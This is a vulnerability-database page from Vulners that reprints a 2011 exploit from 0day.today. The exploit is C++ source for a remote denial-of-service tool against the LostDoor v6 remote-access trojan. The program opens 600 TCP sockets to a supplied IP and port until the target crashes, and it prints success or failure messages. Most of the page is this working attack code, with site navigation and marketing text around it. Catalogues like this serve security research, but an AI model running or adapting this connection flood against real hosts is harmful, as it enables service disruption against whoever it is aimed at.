Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trojan Last Door v6 (Latest version) Denial of service

🗓️ 29 May 2011 00:00:00Reported by Kevin R.VType 
zdt
 zdt🔗 0day.today👁 30 Views

LostDoor v6 Remote Denial Of Service by Kevin R.

Code
/*  LostDoor v6 Remote Denial Of Service
 *  Author: Kevin R.V <[email protected]> 
 *    Date: 2011
 * License: Totally free 8-)
 * 
 * 
 * Some information:
 * 
 * 
 * The protocol used by LastDoor v6 is a simply clear text protocol with a delimitter, thats a normal packet to connect
 * v1ct1m[\AS/]My Host[\AS/] Windows XP Professional[\AS/]testing-a6ae13b[\AS/]2:30:36[\AS/]Spain[\AS/][\AS/]511,48
 * The application split by [\AS/] to get the different paramaters sended by victim	
 * That exploit code simply try to connect 600 TCP sockets, and the trojan get closed by showing an Automated error message because a programming error.
 * 
 * The exploit have 2 random effects: 
 * 1 - computer get freezed, and application get closed automatically in some seconds
 * 2 - Automated error message and application get close in some seconds
 * */

#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;


int PoC(char * host, unsigned int port)
{
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);
	SOCKET sock[600];
    struct sockaddr_in  local[600];
    for(int i = 0; i<600; i++)
    {
		sock[i]=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		local[i].sin_family = AF_INET;
		local[i].sin_addr.s_addr = inet_addr(host);
		local[i].sin_port = htons(port);
		if (connect(sock[i], (struct sockaddr *)&local[i], sizeof(local) ) == 0 )
		{
			connected = 1;
			cout << ".";
		}
		else
		{
			if ( connected )
			{
				cout << endl << endl << "[+] Congrats LostDoor crashed!" << endl;
				break;
			}
			else
			cout << endl << endl << "[-] Sorry not LostDoor detected :(" << endl;
		}
	}
}
int main(int argc, char *argv[])

{
	cout << "LostDoor v6 Denial Of Service " VERS << endl << endl;
	cout << "by Kevin R.V <[email protected]" << endl;
	if ( argc < 2 )
	{
		cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
		exit(-1);
	}
	
	u_short port;
	char * ip;
	
	for(int i = 0; i<argc; i++)
	{
		if( ! strcmp(argv[i], "-h") != 0 )
		ip = argv[i+1];
		else if( ! strcmp(argv[i], "-p") != 0 )
		port = atoi(argv[i+1]);
	}
	
	cout << "[+] Starting exploit" << endl << endl;
	PoC(ip, port);
	
	
	return 1;
}



#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2011 00:00Current
7High risk
Vulners AI Score7
lostdoor v6 remote denialkevin r.vclear text protocoldelimittertcp socketsautomated error messageprogramming errorwinsock2denial of service
30